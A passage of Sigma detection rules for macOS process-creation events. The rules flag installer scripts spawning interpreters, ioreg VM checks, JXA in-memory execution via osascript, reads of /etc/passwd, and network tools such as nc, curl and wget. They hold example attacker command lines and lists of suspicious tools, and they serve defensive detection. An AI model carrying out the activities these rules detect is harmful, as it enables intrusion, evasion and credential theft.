This includes osascript, JXA, curl and wget amongst other interpreters references: - https://redcanary.com/blog/clipping-silver-sparrows-wings/ - https://github.com/elastic/detection-rules/blob/4312d8c9583be524578a14fe6295c3370b9a9307/rules/macos/execution_installer_package_spawned_network_event.toml author: Sohan G (D4rkCiph3r) date: 2023-02-18 tags: - attack.t1059 - attack.t1059.007 - attack.t1071 - attack.t1071.001 - attack.execution - attack.command-and-control logsource: category: process_creation product: macos detection: selection_installer: ParentImage|endswith: - '/package_script_service' - '/installer' Image|endswith: - '/sh' - '/bash' - '/dash' - '/python' - '/ruby' - '/perl' - '/php' - '/javascript' - '/osascript' - '/tclsh' - '/curl' - '/wget' CommandLine|contains: - 'preinstall' - 'postinstall' condition: selection_installer falsepositives: - Legitimate software uses the scripts (preinstall, postinstall) level: medium ================================================ FILE: rules/macos/process_creation/proc_creation_macos_ioreg_discovery.yml ================================================ title: System Information Discovery Using Ioreg id: 2d5e7a8b-f484-4a24-945d-7f0efd52eab0 status: test description: | Detects the use of "ioreg" which will show I/O Kit registry information. This process is used for system information discovery. It has been observed in-the-wild by calling this process directly or using bash and grep to look for specific strings. 
references: - https://www.virustotal.com/gui/file/0373d78db6c3c0f6f6dcc409821bf89e1ad8c165d6f95c5c80ecdce2219627d7/behavior - https://www.virustotal.com/gui/file/4ffdc72d1ff1ee8228e31691020fc275afd1baee5a985403a71ca8c7bd36e2e4/behavior - https://www.virustotal.com/gui/file/5907d59ec1303cfb5c0a0f4aaca3efc0830707d86c732ba6b9e842b5730b95dc/behavior - https://www.trendmicro.com/en_ph/research/20/k/new-macos-backdoor-connected-to-oceanlotus-surfaces.html author: Joseliyo Sanchez, @Joseliyo_Jstnk date: 2023-12-20 modified: 2024-01-02 tags: - attack.discovery - attack.t1082 logsource: product: macos category: process_creation detection: # Examples: # /bin/bash /bin/sh -c ioreg -l | grep -e 'VirtualBox' -e 'Oracle' -e 'VMware' -e 'Parallels' | wc -l # /usr/sbin/ioreg ioreg -rd1 -w0 -c AppleAHCIDiskDriver # /bin/bash /bin/sh -c ioreg -l | grep -e 'USB Vendor Name' # ioreg -rd1 -c IOPlatformExpertDevice | awk '/IOPlatformSerialNumber/ { split($0, line, \"\\\"\"); printf(\"%s\", line[4]); } selection_img: - Image|endswith: '/ioreg' - CommandLine|contains: 'ioreg' selection_cmd1: CommandLine|contains: - '-l' - '-c' selection_cmd2: CommandLine|contains: - 'AppleAHCIDiskDriver' - 'IOPlatformExpertDevice' - 'Oracle' - 'Parallels' - 'USB Vendor Name' - 'VirtualBox' - 'VMware' condition: all of selection_* falsepositives: - Legitimate administrative activities level: medium ================================================ FILE: rules/macos/process_creation/proc_creation_macos_jamf_susp_child.yml ================================================ title: JAMF MDM Potential Suspicious Child Process id: 2316929c-01aa-438c-970f-099145ab1ee6 status: test description: Detects potential suspicious child processes of "jamf". Could be a sign of potential abuse of Jamf as a C2 server as seen by Typhon MythicAgent. 
references: - https://github.com/MythicAgents/typhon/ - https://www.zoocoup.org/casper/jamf_cheatsheet.pdf - https://docs.jamf.com/10.30.0/jamf-pro/administrator-guide/Components_Installed_on_Managed_Computers.html author: Nasreddine Bencherchali (Nextron Systems) date: 2023-08-22 tags: - attack.execution logsource: category: process_creation product: macos detection: selection: ParentImage|endswith: '/jamf' Image|endswith: # Note: Add additional binaries/commands that are uncommon during your typical admin usage of Jamf - '/bash' - '/sh' condition: selection falsepositives: - Legitimate execution of custom scripts or commands by Jamf administrators. Apply additional filters accordingly level: medium ================================================ FILE: rules/macos/process_creation/proc_creation_macos_jamf_usage.yml ================================================ title: JAMF MDM Execution id: be2e3a5c-9cc7-4d02-842a-68e9cb26ec49 status: test description: | Detects execution of the "jamf" binary to create user accounts and run commands. For example, the binary can be abused by attackers on the system in order to bypass security controls or remove application control policies. 
references: - https://github.com/MythicAgents/typhon/ - https://www.zoocoup.org/casper/jamf_cheatsheet.pdf - https://docs.jamf.com/10.30.0/jamf-pro/administrator-guide/Components_Installed_on_Managed_Computers.html author: Jay Pandit date: 2023-08-22 tags: - attack.execution logsource: category: process_creation product: macos detection: selection: Image|endswith: '/jamf' CommandLine|contains: # Note: add or remove commands according to your policy - 'createAccount' - 'manage' - 'removeFramework' - 'removeMdmProfile' - 'resetPassword' - 'setComputerName' condition: selection falsepositives: - Legitimate use of the JAMF CLI tool by IT support and administrators level: low ================================================ FILE: rules/macos/process_creation/proc_creation_macos_jxa_in_memory_execution.yml ================================================ title: JXA In-memory Execution Via OSAScript id: f1408a58-0e94-4165-b80a-da9f96cf6fc3 related: - id: 1bc2e6c5-0885-472b-bed6-be5ea8eace55 type: derived status: test description: Detects possible malicious execution of JXA in-memory via OSAScript references: - https://redcanary.com/blog/applescript/ author: Sohan G (D4rkCiph3r) date: 2023-01-31 tags: - attack.t1059.002 - attack.t1059.007 - attack.execution logsource: product: macos category: process_creation detection: selection_main: CommandLine|contains|all: - 'osascript' - ' -e ' - 'eval' - 'NSData.dataWithContentsOfURL' selection_js: - CommandLine|contains|all: - ' -l ' - 'JavaScript' - CommandLine|contains: '.js' condition: all of selection_* falsepositives: - Unknown level: high ================================================ FILE: rules/macos/process_creation/proc_creation_macos_launchctl_execution.yml ================================================ title: Launch Agent/Daemon Execution Via Launchctl id: ae9d710f-dcd1-4f75-a0a5-93a73b5dda0e status: test description: Detects the execution of programs as Launch Agents or Launch Daemons using launchctl on macOS. 
references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1569.001/T1569.001.md - https://www.sentinelone.com/labs/20-common-tools-techniques-used-by-macos-threat-actors-malware/ - https://www.welivesecurity.com/2020/07/16/mac-cryptocurrency-trading-application-rebranded-bundled-malware/ - https://www.trendmicro.com/en_us/research/18/d/new-macos-backdoor-linked-to-oceanlotus-found.html - https://www.loobins.io/binaries/launchctl/ author: Pratinav Chandra date: 2024-05-13 tags: - attack.privilege-escalation - attack.execution - attack.persistence - attack.t1569.001 - attack.t1543.001 - attack.t1543.004 logsource: category: process_creation product: macos detection: selection: Image|endswith: '/launchctl' CommandLine|contains: - 'submit' - 'load' - 'start' condition: selection falsepositives: - Legitimate administration activities are expected to trigger false positives. Investigate the command line being passed to determine if the service or launch agent is suspicious. 
level: medium ================================================ FILE: rules/macos/process_creation/proc_creation_macos_local_account.yml ================================================ title: Local System Accounts Discovery - MacOs id: ddf36b67-e872-4507-ab2e-46bda21b842c status: test description: Detects enumeration of local system accounts on MacOS references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1087.001/T1087.001.md author: Alejandro Ortuno, oscd.community date: 2020-10-08 modified: 2022-11-27 tags: - attack.discovery - attack.t1087.001 logsource: category: process_creation product: macos detection: selection_1: Image|endswith: '/dscl' CommandLine|contains|all: - 'list' - '/users' selection_2: Image|endswith: '/dscacheutil' CommandLine|contains|all: - '-q' - 'user' selection_3: CommandLine|contains: '''x:0:''' selection_4: Image|endswith: '/cat' CommandLine|contains: - '/etc/passwd' - '/etc/sudoers' selection_5: Image|endswith: '/id' selection_6: Image|endswith: '/lsof' CommandLine|contains: '-u' condition: 1 of selection* falsepositives: - Legitimate administration activities level: low ================================================ FILE: rules/macos/process_creation/proc_creation_macos_local_groups.yml ================================================ title: Local Groups Discovery - MacOs id: 89bb1f97-c7b9-40e8-b52b-7d6afbd67276 status: test description: Detects enumeration of local system groups references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.001/T1069.001.md author: Ömer Günal, Alejandro Ortuno, oscd.community date: 2020-10-11 modified: 2022-11-27 tags: - attack.discovery - attack.t1069.001 logsource: category: process_creation product: macos detection: selection_1: Image|endswith: '/dscacheutil' CommandLine|contains|all: - '-q' - 'group' selection_2: Image|endswith: '/cat' CommandLine|contains: '/etc/group' 
selection_3: Image|endswith: '/dscl' CommandLine|contains|all: - '-list' - '/groups' condition: 1 of selection* falsepositives: - Legitimate administration activities level: informational ================================================ FILE: rules/macos/process_creation/proc_creation_macos_network_service_scanning.yml ================================================ title: MacOS Network Service Scanning id: 84bae5d4-b518-4ae0-b331-6d4afd34d00f status: test description: Detects enumeration of local or remote network services. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1046/T1046.md author: Alejandro Ortuno, oscd.community date: 2020-10-21 modified: 2021-11-27 tags: - attack.discovery - attack.t1046 logsource: category: process_creation product: macos detection: selection_1: Image|endswith: - '/nc' - '/netcat' selection_2: Image|endswith: - '/nmap' - '/telnet' filter: CommandLine|contains: 'l' condition: (selection_1 and not filter) or selection_2 falsepositives: - Legitimate administration activities level: low ================================================ FILE: rules/macos/process_creation/proc_creation_macos_network_sniffing.yml ================================================ title: Network Sniffing - MacOs id: adc9bcc4-c39c-4f6b-a711-1884017bf043 status: test description: | Detects the usage of tooling to sniff network traffic. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data. 
references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1040/T1040.md author: Alejandro Ortuno, oscd.community date: 2020-10-14 modified: 2022-11-26 tags: - attack.discovery - attack.credential-access - attack.t1040 logsource: category: process_creation product: macos detection: selection: Image|endswith: - '/tcpdump' - '/tshark' condition: selection falsepositives: - Legitimate administration activities level: informational ================================================ FILE: rules/macos/process_creation/proc_creation_macos_nscurl_usage.yml ================================================ title: File Download Via Nscurl - MacOS id: 6d8a7cf1-8085-423b-b87d-7e880faabbdf status: test description: Detects the execution of the nscurl utility in order to download files. references: - https://www.loobins.io/binaries/nscurl/ - https://www.agnosticdev.com/content/how-diagnose-app-transport-security-issues-using-nscurl-and-openssl - https://gist.github.com/nasbench/ca6ef95db04ae04ffd1e0b1ce709cadd author: Daniel Cortez date: 2024-06-04 tags: - attack.defense-evasion - attack.command-and-control - attack.t1105 logsource: category: process_creation product: macos detection: selection: Image|endswith: '/nscurl' CommandLine|contains: - '--download ' - '--download-directory ' - '--output ' - '-dir ' - '-dl ' - '-ld' - '-o ' condition: selection falsepositives: - Legitimate usage of nscurl by administrators and users. level: medium ================================================ FILE: rules/macos/process_creation/proc_creation_macos_office_susp_child_processes.yml ================================================ title: Suspicious Microsoft Office Child Process - MacOS id: 69483748-1525-4a6c-95ca-90dc8d431b68 status: test description: Detects suspicious child processes spawning from microsoft office suite applications such as word or excel. 
This could indicate malicious macro execution references: - https://redcanary.com/blog/applescript/ - https://objective-see.org/blog/blog_0x4B.html author: Sohan G (D4rkCiph3r) date: 2023-01-31 modified: 2023-02-04 tags: - attack.execution - attack.persistence - attack.t1059.002 - attack.t1137.002 - attack.t1204.002 logsource: product: macos category: process_creation detection: selection: ParentImage|contains: - 'Microsoft Word' - 'Microsoft Excel' - 'Microsoft PowerPoint' - 'Microsoft OneNote' Image|endswith: - '/bash' - '/curl' - '/dash' - '/fish' - '/osacompile' - '/osascript' - '/sh' - '/zsh' - '/python' - '/python3' - '/wget' condition: selection falsepositives: - Unknown level: high ================================================ FILE: rules/macos/process_creation/proc_creation_macos_osacompile_runonly_execution.yml ================================================ title: OSACompile Run-Only Execution id: b9d9b652-d8ed-4697-89a2-a1186ee680ac status: test description: Detects potential suspicious run-only executions compiled using OSACompile references: - https://redcanary.com/blog/applescript/ - https://ss64.com/osx/osacompile.html author: Sohan G (D4rkCiph3r) date: 2023-01-31 tags: - attack.t1059.002 - attack.execution logsource: product: macos category: process_creation detection: selection: CommandLine|contains|all: - 'osacompile' - ' -x ' - ' -e ' condition: selection falsepositives: - Unknown level: high ================================================ FILE: rules/macos/process_creation/proc_creation_macos_payload_decoded_and_decrypted.yml ================================================ title: Payload Decoded and Decrypted via Built-in Utilities id: 234dc5df-40b5-49d1-bf53-0d44ce778eca status: test description: Detects when a built-in utility is used to decode and decrypt a payload after a macOS disk image (DMG) is executed. 
Malware authors may attempt to evade detection and trick users into executing malicious code by encoding and encrypting their payload and placing it in a disk image file. This behavior is consistent with adware or malware families such as Bundlore and Shlayer. references: - https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-5d42c3d772e04f1e8d0eb60f5233bc79def1ea73105a2d8822f44164f77ef823 author: Tim Rauch (rule), Elastic (idea) date: 2022-10-17 tags: - attack.t1059 - attack.t1204 - attack.execution - attack.t1140 - attack.defense-evasion - attack.s0482 - attack.s0402 logsource: category: process_creation product: macos detection: selection: Image|endswith: '/openssl' CommandLine|contains|all: - '/Volumes/' - 'enc' - '-base64' - ' -d ' condition: selection falsepositives: - Unknown level: medium ================================================ FILE: rules/macos/process_creation/proc_creation_macos_persistence_via_plistbuddy.yml ================================================ title: Potential Persistence Via PlistBuddy id: 65d506d3-fcfe-4071-b4b2-bcefe721bbbb status: test description: Detects potential persistence activity using LaunchAgents or LaunchDaemons via the PlistBuddy utility references: - https://redcanary.com/blog/clipping-silver-sparrows-wings/ - https://www.manpagez.com/man/8/PlistBuddy/ author: Sohan G (D4rkCiph3r) date: 2023-02-18 tags: - attack.privilege-escalation - attack.persistence - attack.t1543.001 - attack.t1543.004 logsource: category: process_creation product: macos detection: selection: Image|endswith: '/PlistBuddy' CommandLine|contains|all: - 'RunAtLoad' - 'true' CommandLine|contains: - 'LaunchAgents' - 'LaunchDaemons' condition: selection falsepositives: - Unknown level: high ================================================ FILE: rules/macos/process_creation/proc_creation_macos_remote_access_tools_meshagent_arguments.yml ================================================ title: Remote 
Access Tool - Potential MeshAgent Execution - MacOS id: 22c45af6-f590-4d44-bab3-b5b2d2a2b6d9 related: - id: 2fbbe9ff-0afc-470b-bdc0-592198339968 type: similar status: experimental description: | Detects potential execution of MeshAgent which is a tool used for remote access. Historical data shows that threat actors rename MeshAgent binary to evade detection. Matching command lines with the '--meshServiceName' argument can indicate that the MeshAgent is being used for remote access. references: - https://www.huntress.com/blog/know-thy-enemy-a-novel-november-case-on-persistent-remote-access - https://thecyberexpress.com/ukraine-hit-by-meshagent-malware-campaign/ - https://wazuh.com/blog/how-to-detect-meshagent-with-wazuh/ - https://www.security.com/threat-intelligence/medusa-ransomware-attacks author: Norbert Jaśniewicz (AlphaSOC) date: 2025-05-19 tags: - attack.command-and-control - attack.t1219.002 logsource: category: process_creation product: macos detection: selection: CommandLine|contains: '--meshServiceName' condition: selection falsepositives: - Environments that legitimately use MeshAgent level: medium ================================================ FILE: rules/macos/process_creation/proc_creation_macos_remote_access_tools_renamed_meshagent_execution.yml ================================================ title: Remote Access Tool - Renamed MeshAgent Execution - MacOS id: bd3b5eaa-439d-4a42-8f35-a49f5c8a2582 related: - id: b471f462-eb0d-4832-be35-28d94bdb4780 type: similar - id: 22c45af6-f590-4d44-bab3-b5b2d2a2b6d9 type: derived status: experimental description: | Detects the execution of a renamed instance of the Remote Monitoring and Management (RMM) tool, MeshAgent. RMM tools such as MeshAgent are commonly utilized by IT administrators for legitimate remote support and system management. However, malicious actors may exploit these tools by renaming them to bypass detection mechanisms, enabling unauthorized access and control over compromised systems. 
references: - https://www.huntress.com/blog/know-thy-enemy-a-novel-november-case-on-persistent-remote-access - https://thecyberexpress.com/ukraine-hit-by-meshagent-malware-campaign/ - https://wazuh.com/blog/how-to-detect-meshagent-with-wazuh/ - https://www.security.com/threat-intelligence/medusa-ransomware-attacks author: Norbert Jaśniewicz (AlphaSOC) date: 2025-05-19 tags: - attack.command-and-control - attack.defense-evasion - attack.t1219.002 - attack.t1036.003 logsource: category: process_creation product: macos detection: selection_meshagent: - CommandLine|contains: '--meshServiceName' - OriginalFileName|contains: 'meshagent' filter_main_legitimate: Image|endswith: - '/meshagent' - '/meshagent_osx64' condition: selection_meshagent and not 1 of filter_main_* falsepositives: - Unknown level: high ================================================ FILE: rules/macos/process_creation/proc_creation_macos_remote_access_tools_teamviewer_incoming_connection.yml ================================================ title: Remote Access Tool - Team Viewer Session Started On MacOS Host id: f459ccb4-9805-41ea-b5b2-55e279e2424a related: - id: ab70c354-d9ac-4e11-bbb6-ec8e3b153357 type: similar - id: 1f6b8cd4-3e60-47cc-b282-5aa1cbc9182d type: similar status: test description: | Detects the command line executed when TeamViewer starts a session started by a remote host. Once a connection has been started, an investigator can verify the connection details by viewing the "incoming_connections.txt" log file in the TeamViewer folder. 
references: - Internal Research author: Josh Nickels, Qi Nan date: 2024-03-11 tags: - attack.persistence - attack.initial-access - attack.t1133 logsource: category: process_creation product: macos detection: selection: ParentImage|endswith: '/TeamViewer_Service' Image|endswith: '/TeamViewer_Desktop' CommandLine|endswith: '/TeamViewer_Desktop --IPCport 5939 --Module 1' condition: selection falsepositives: - Legitimate usage of TeamViewer level: low ================================================ FILE: rules/macos/process_creation/proc_creation_macos_remote_system_discovery.yml ================================================ title: Macos Remote System Discovery id: 10227522-8429-47e6-a301-f2b2d014e7ad status: test description: Detects the enumeration of other remote systems. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md author: Alejandro Ortuno, oscd.community date: 2020-10-22 modified: 2021-11-27 tags: - attack.discovery - attack.t1018 logsource: category: process_creation product: macos detection: selection_1: Image|endswith: '/arp' CommandLine|contains: '-a' selection_2: Image|endswith: '/ping' CommandLine|contains: - ' 10.' # 10.0.0.0/8 - ' 192.168.' # 192.168.0.0/16 - ' 172.16.' # 172.16.0.0/12 - ' 172.17.' - ' 172.18.' - ' 172.19.' - ' 172.20.' - ' 172.21.' - ' 172.22.' - ' 172.23.' - ' 172.24.' - ' 172.25.' - ' 172.26.' - ' 172.27.' - ' 172.28.' - ' 172.29.' - ' 172.30.' - ' 172.31.' - ' 127.' # 127.0.0.0/8 - ' 169.254.' 
# 169.254.0.0/16 condition: 1 of selection* falsepositives: - Legitimate administration activities level: informational ================================================ FILE: rules/macos/process_creation/proc_creation_macos_schedule_task_job_cron.yml ================================================ title: Scheduled Cron Task/Job - MacOs id: 7c3b43d8-d794-47d2-800a-d277715aa460 status: test description: Detects abuse of the cron utility to perform task scheduling for initial or recurring execution of malicious code. Detection will focus on crontab jobs uploaded from the tmp folder. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.003/T1053.003.md author: Alejandro Ortuno, oscd.community date: 2020-10-06 modified: 2022-11-27 tags: - attack.execution - attack.persistence - attack.privilege-escalation - attack.t1053.003 logsource: category: process_creation product: macos detection: selection: Image|endswith: '/crontab' CommandLine|contains: '/tmp/' condition: selection falsepositives: - Legitimate administration activities level: medium ================================================ FILE: rules/macos/process_creation/proc_creation_macos_screencapture.yml ================================================ title: Screen Capture - macOS id: 0877ed01-da46-4c49-8476-d49cdd80dfa7 status: test description: Detects attempts to use screencapture to collect macOS screenshots references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1113/T1113.md - https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/collection/osx/screenshot.py author: remotephone, oscd.community date: 2020-10-13 modified: 2021-11-27 tags: - attack.collection - attack.t1113 logsource: product: macos category: process_creation detection: selection: Image: '/usr/sbin/screencapture' condition: selection falsepositives: - Legitimate 
user activity taking screenshots level: low ================================================ FILE: rules/macos/process_creation/proc_creation_macos_security_software_discovery.yml ================================================ title: Security Software Discovery - MacOs id: 0ed75b9c-c73b-424d-9e7d-496cd565fbe0 status: test description: Detects usage of system utilities (only grep for now) to discover installed security software references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1518.001/T1518.001.md author: Daniil Yugoslavskiy, oscd.community date: 2020-10-19 modified: 2022-11-27 tags: - attack.discovery - attack.t1518.001 logsource: category: process_creation product: macos detection: image: Image: '/usr/bin/grep' selection_cli_1: CommandLine|contains: - 'nessusd' # nessus vulnerability scanner - 'santad' # google santa - 'CbDefense' # carbon black - 'falcond' # crowdstrike falcon - 'td-agent' # fluentd log shipper - 'packetbeat' # elastic network logger/shipper - 'filebeat' # elastic log file shipper - 'auditbeat' # elastic auditing agent/log shipper - 'osqueryd' # facebook osquery - 'BlockBlock' # Objective-See persistence locations watcher/blocker - 'LuLu' # Objective-See firewall management utility selection_cli_2: # Objective Development Software firewall management utility CommandLine|contains|all: - 'Little' - 'Snitch' condition: image and 1 of selection_cli_* falsepositives: - Legitimate activities level: medium ================================================ FILE: rules/macos/process_creation/proc_creation_macos_space_after_filename.yml ================================================ title: Space After Filename - macOS id: b6e2a2e3-2d30-43b1-a4ea-071e36595690 status: test description: Detects attempts to masquerade as legitimate files by adding a space to the end of the filename. 
references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1036.006/T1036.006.md author: remotephone date: 2021-11-20 modified: 2023-01-04 tags: - attack.defense-evasion - attack.t1036.006 logsource: product: macos category: process_creation detection: selection1: CommandLine|endswith: ' ' selection2: Image|endswith: ' ' condition: 1 of selection* falsepositives: - Mistyped commands or legitimate binaries named to match the pattern level: low ================================================ FILE: rules/macos/process_creation/proc_creation_macos_split_file_into_pieces.yml ================================================ title: Split A File Into Pieces id: 7f2bb9d5-6395-4de5-969c-70c11fbe6b12 status: test description: Detects use of the command "split" to split files into parts for possible transfer. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1030/T1030.md author: 'Igor Fits, Mikhail Larin, oscd.community' date: 2020-10-15 modified: 2021-11-27 tags: - attack.exfiltration - attack.t1030 logsource: product: macos category: process_creation detection: selection: Image|endswith: '/split' condition: selection falsepositives: - Legitimate administrative activity level: low ================================================ FILE: rules/macos/process_creation/proc_creation_macos_susp_browser_child_process.yml ================================================ title: Suspicious Browser Child Process - MacOS id: 0250638a-2b28-4541-86fc-ea4c558fa0c6 status: test description: Detects suspicious child processes spawned from browsers. This could be a result of a potential web browser exploitation. 
references: - https://fr.slideshare.net/codeblue_jp/cb19-recent-apt-attack-on-crypto-exchange-employees-by-heungsoo-kang - https://github.com/elastic/detection-rules/blob/4312d8c9583be524578a14fe6295c3370b9a9307/rules/macos/execution_initial_access_suspicious_browser_childproc.toml author: Sohan G (D4rkCiph3r) date: 2023-04-05 tags: - attack.initial-access - attack.execution - attack.t1189 - attack.t1203 - attack.t1059 logsource: category: process_creation product: macos detection: selection: ParentImage|contains: - 'com.apple.WebKit.WebContent' - 'firefox' - 'Google Chrome Helper' - 'Google Chrome' - 'Microsoft Edge' - 'Opera' - 'Safari' - 'Tor Browser' Image|endswith: - '/bash' - '/curl' - '/dash' - '/ksh' - '/osascript' - '/perl' - '/php' - '/pwsh' - '/python' - '/sh' - '/tcsh' - '/wget' - '/zsh' filter_main_generic: CommandLine|contains: '--defaults-torrc' # Informs tor to use default config file filter_main_ms_autoupdate: CommandLine|contains: '/Library/Application Support/Microsoft/MAU*/Microsoft AutoUpdate.app/Contents/MacOS/msupdate' # Microsoft AutoUpdate utility filter_main_chrome: ParentImage|contains: - 'Google Chrome Helper' - 'Google Chrome' CommandLine|contains: - '/Volumes/Google Chrome/Google Chrome.app/Contents/Frameworks/*/Resources/install.sh' # Install the Google Chrome browser - '/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/*/Resources/keystone_promote_preflight.sh' # Updates the Google Chrome branding configuration files - '/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/*/Resources/keystone_promote_postflight.sh' # Script that performs the post-installation tasks filter_main_ms_edge: ParentImage|contains: 'Microsoft Edge' CommandLine|contains: - 'IOPlatformExpertDevice' # Retrieves the IOPlatformUUID (parent process - Microsoft Edge) - 'hw.model' # Retrieves model name of the computer's hardware (parent process - Microsoft Edge) filter_main_chromerecovery: 
ParentImage|contains: - 'Google Chrome Helper' - 'Google Chrome' CommandLine|contains|all: - '/Users/' - '/Library/Application Support/Google/Chrome/recovery/' - '/ChromeRecovery' filter_optional_null: # Avoids alerting for the events which do not have command-line arguments CommandLine: null filter_optional_empty: # Avoids alerting for the events which do not have command-line arguments CommandLine: '' condition: selection and not 1 of filter_main_* and not 1 of filter_optional_* falsepositives: - Legitimate browser install, update and recovery scripts level: medium ================================================ FILE: rules/macos/process_creation/proc_creation_macos_susp_execution_macos_script_editor.yml ================================================ title: Suspicious Execution via macOS Script Editor id: 6e4dcdd1-e48b-42f7-b2d8-3b413fc58cb4 status: test description: Detects when the macOS Script Editor utility spawns an unusual child process. author: Tim Rauch (rule), Elastic (idea) references: - https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-7f541fbc4a4a28a92970e8bf53effea5bd934604429112c920affb457f5b2685 - https://wojciechregula.blog/post/macos-red-teaming-initial-access-via-applescript-url/ date: 2022-10-21 modified: 2022-12-28 logsource: category: process_creation product: macos tags: - attack.t1566 - attack.t1566.002 - attack.initial-access - attack.t1059 - attack.t1059.002 - attack.t1204 - attack.t1204.001 - attack.execution - attack.persistence - attack.t1553 - attack.defense-evasion detection: selection_parent: ParentImage|endswith: '/Script Editor' selection_img: - Image|endswith: - '/curl' - '/bash' - '/sh' - '/zsh' - '/dash' - '/fish' - '/osascript' - '/mktemp' - '/chmod' - '/php' - '/nohup' - '/openssl' - '/plutil' - '/PlistBuddy' - '/xattr' - '/sqlite' - '/funzip' - '/popen' - Image|contains: - 'python' - 'perl' condition: all of selection_* falsepositives: - Unknown level: medium 
================================================ FILE: rules/macos/process_creation/proc_creation_macos_susp_find_execution.yml ================================================ title: Potential Discovery Activity Using Find - MacOS id: 85de3a19-b675-4a51-bfc6-b11a5186c971 related: - id: 8344c0e5-5783-47cc-9cf9-a0f7fd03e6cf type: similar status: test description: Detects usage of "find" binary in a suspicious manner to perform discovery references: - https://github.com/SaiSathvik1/Linux-Privilege-Escalation-Notes author: Nasreddine Bencherchali (Nextron Systems) date: 2022-12-28 tags: - attack.discovery - attack.t1083 logsource: category: process_creation product: macos detection: selection: Image|endswith: '/find' CommandLine|contains: - '-perm -4000' - '-perm -2000' - '-perm 0777' - '-perm -222' - '-perm -o w' - '-perm -o x' - '-perm -u=s' - '-perm -g=s' condition: selection falsepositives: - Unknown level: medium ================================================ FILE: rules/macos/process_creation/proc_creation_macos_susp_histfile_operations.yml ================================================ title: Suspicious History File Operations id: 508a9374-ad52-4789-b568-fc358def2c65 status: test description: Detects commandline operations on shell history files references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.003/T1552.003.md author: 'Mikhail Larin, oscd.community' date: 2020-10-17 modified: 2021-11-27 tags: - attack.credential-access - attack.t1552.003 logsource: product: macos category: process_creation detection: selection: CommandLine|contains: - '.bash_history' - '.zsh_history' - '.zhistory' - '.history' - '.sh_history' - 'fish_history' condition: selection falsepositives: - Legitimate administrative activity - Legitimate software, cleaning hist file level: medium ================================================ FILE: 
rules/macos/process_creation/proc_creation_macos_susp_in_memory_download_and_compile.yml ================================================ title: Potential In-Memory Download And Compile Of Payloads id: 13db8d2e-7723-4c2c-93c1-a4d36994f7ef status: test description: Detects potential in-memory downloading and compiling of applets using curl and osacompile as seen used by XCSSET malware references: - https://redcanary.com/blog/mac-application-bundles/ author: Sohan G (D4rkCiph3r), Red Canary (idea) date: 2023-08-22 tags: - attack.command-and-control - attack.execution - attack.t1059.007 - attack.t1105 logsource: category: process_creation product: macos detection: selection: CommandLine|contains|all: - 'osacompile' - 'curl' condition: selection falsepositives: - Unknown level: medium ================================================ FILE: rules/macos/process_creation/proc_creation_macos_susp_macos_firmware_activity.yml ================================================ title: Suspicious MacOS Firmware Activity id: 7ed2c9f7-c59d-4c82-a7e2-f859aa676099 status: test description: Detects when a user manipulates the Firmware Password on MacOS. NOTE - this command has been disabled on silicon-based apple computers. 
references: - https://github.com/usnistgov/macos_security/blob/932a51f3e819dd3e02ebfcf3ef433cfffafbe28b/rules/os/os_firmware_password_require.yaml - https://www.manpagez.com/man/8/firmwarepasswd/ - https://support.apple.com/guide/security/firmware-password-protection-sec28382c9ca/web author: Austin Songer @austinsonger date: 2021-09-30 modified: 2022-10-09 tags: - attack.impact logsource: category: process_creation product: macos detection: selection1: Image: '/usr/sbin/firmwarepasswd' CommandLine|contains: - 'setpasswd' - 'full' - 'delete' - 'check' condition: selection1 falsepositives: - Legitimate administration activities level: medium ================================================ FILE: rules/macos/process_creation/proc_creation_macos_susp_system_network_discovery.yml ================================================ title: System Network Discovery - macOS id: 58800443-f9fc-4d55-ae0c-98a3966dfb97 status: test description: Detects enumeration of local network configuration references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1016/T1016.md author: remotephone, oscd.community date: 2020-10-06 modified: 2024-08-29 tags: - attack.discovery - attack.t1016 logsource: product: macos category: process_creation detection: selection_1: Image|endswith: - '/arp' - '/ifconfig' - '/netstat' - '/networksetup' - '/socketfilterfw' selection_2: Image: '/usr/bin/defaults' CommandLine|contains|all: - '/Library/Preferences/com.apple.alf' - 'read' filter_main_wifivelocityd: ParentImage|endswith: '/wifivelocityd' condition: 1 of selection_* and not 1 of filter_main_* falsepositives: - Legitimate administration activities level: informational ================================================ FILE: rules/macos/process_creation/proc_creation_macos_suspicious_applet_behaviour.yml ================================================ title: Osacompile Execution By Potentially Suspicious Applet/Osascript id: 
